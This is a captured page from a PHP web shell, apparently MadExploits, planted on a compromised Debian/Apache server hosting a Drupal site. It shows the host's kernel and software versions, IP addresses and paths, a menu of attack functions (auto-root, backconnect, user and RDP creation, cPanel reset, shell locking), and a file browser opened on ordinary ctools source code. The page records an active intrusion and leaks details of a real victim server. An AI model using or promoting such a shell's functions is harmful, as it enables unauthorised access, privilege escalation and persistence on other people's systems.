Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.144.40.90
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
action-links.theme.inc
697
B
-rw-r--r--
ajax.inc
4.67
KB
-rw-r--r--
cache.inc
5.79
KB
-rw-r--r--
cache.plugin-type.inc
236
B
-rw-r--r--
cleanstring.inc
7.66
KB
-rw-r--r--
collapsible.theme.inc
2.46
KB
-rw-r--r--
content.inc
25.63
KB
-rw-r--r--
content.menu.inc
6.67
KB
-rw-r--r--
content.plugin-type.inc
381
B
-rw-r--r--
content.theme.inc
458
B
-rw-r--r--
context-access-admin.inc
15.17
KB
-rw-r--r--
context-admin.inc
27.37
KB
-rw-r--r--
context-task-handler.inc
17.42
KB
-rw-r--r--
context.inc
47.33
KB
-rw-r--r--
context.menu.inc
1.23
KB
-rw-r--r--
context.plugin-type.inc
545
B
-rw-r--r--
context.theme.inc
12.42
KB
-rw-r--r--
css-cache.inc
971
B
-rw-r--r--
css.inc
17.43
KB
-rw-r--r--
dependent.inc
6.16
KB
-rw-r--r--
dropbutton.theme.inc
5.05
KB
-rw-r--r--
dropdown.theme.inc
3.1
KB
-rw-r--r--
entity-access.inc
4.61
KB
-rw-r--r--
export-ui.inc
16.62
KB
-rw-r--r--
export-ui.menu.inc
710
B
-rw-r--r--
export-ui.plugin-type.inc
536
B
-rw-r--r--
export.inc
39.03
KB
-rw-r--r--
fields.inc
12.42
KB
-rw-r--r--
jump-menu.inc
4.6
KB
-rw-r--r--
language.inc
1.18
KB
-rw-r--r--
math-expr.inc
17.69
KB
-rw-r--r--
menu.inc
3.28
KB
-rw-r--r--
modal.inc
7.77
KB
-rw-r--r--
object-cache.cron.inc
345
B
-rw-r--r--
object-cache.inc
6.39
KB
-rw-r--r--
page-wizard.inc
5.12
KB
-rw-r--r--
page-wizard.menu.inc
756
B
-rw-r--r--
plugins-admin.inc
7.38
KB
-rw-r--r--
plugins.inc
31.89
KB
-rw-r--r--
registry.inc
3
KB
-rw-r--r--
stylizer.inc
48.24
KB
-rw-r--r--
stylizer.theme.inc
647
B
-rw-r--r--
utility.inc
1.05
KB
-rw-r--r--
uuid.inc
1.97
KB
-rw-r--r--
views.inc
879
B
-rw-r--r--
wizard.inc
17.74
KB
-rw-r--r--
wizard.theme.inc
539
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : registry.inc
<?php /** * @file * * Registry magic. In a separate file to minimize unnecessary code loading. */ /** * Implements (via delegation) hook_registry_files_alter(). * * Alter the registry of files to automagically include all classes in * class-based plugins. */ function _ctools_registry_files_alter(&$files, $indexed_modules) { ctools_include('plugins'); // Remap the passed indexed modules into a useful format. $modules = array(); foreach ($indexed_modules as $module_object) { $modules[$module_object->name] = $module_object; } $all_type_info = ctools_plugin_get_plugin_type_info(TRUE); foreach ($all_type_info as $module => $plugin_types) { foreach ($plugin_types as $plugin_type_name => $plugin_type_info) { if (empty($plugin_type_info['classes'])) { // This plugin type does not use classes, so skip it. continue; } // Retrieve the full list of plugins of this type. $plugins = ctools_get_plugins($module, $plugin_type_name); foreach ($plugins as $plugin_name => $plugin_definition) { foreach ($plugin_type_info['classes'] as $class_key) { if (empty($plugin_definition[$class_key])) { // Plugin doesn't provide a class for this class key, so skip it. continue; } if (is_string($plugin_definition[$class_key])) { // Plugin definition uses the shorthand for defining a class name // and location; look for the containing file by following naming // convention. $path = $plugin_definition['path'] . '/' . $plugin_definition[$class_key] . '.class.php'; } else { // Plugin uses the verbose definition to indicate where its class // files are. $class = $plugin_definition[$class_key]['class']; // Use the filename if it's explicitly set, else follow the naming // conventions. $filename = isset($plugin_definition[$class_key]['file']) ? $plugin_definition[$class_key]['file'] : $class . '.class.php'; $base_path = isset($plugin_definition[$class_key]['path']) ? $plugin_definition[$class_key]['path'] : $plugin_definition['path']; $path = "$base_path/$filename"; } if (file_exists($path)) { // If the file exists, add it to the files for registry building. $files[$path] = array('module' => $plugin_definition['module'], 'weight' => $modules[$plugin_definition['module']]->weight); } else { // Else, watchdog that we've got some erroneous plugin info. $args = array( '@plugin' => $plugin_definition['name'], '@owner' => $module, '@type' => $plugin_type_name, '@file' => $path, '@class' => $class_key, ); watchdog('ctools', 'Plugin @plugin of plugin type @owner:@type points to nonexistent file @file for class handler @class.', $args); } } } } } }
Close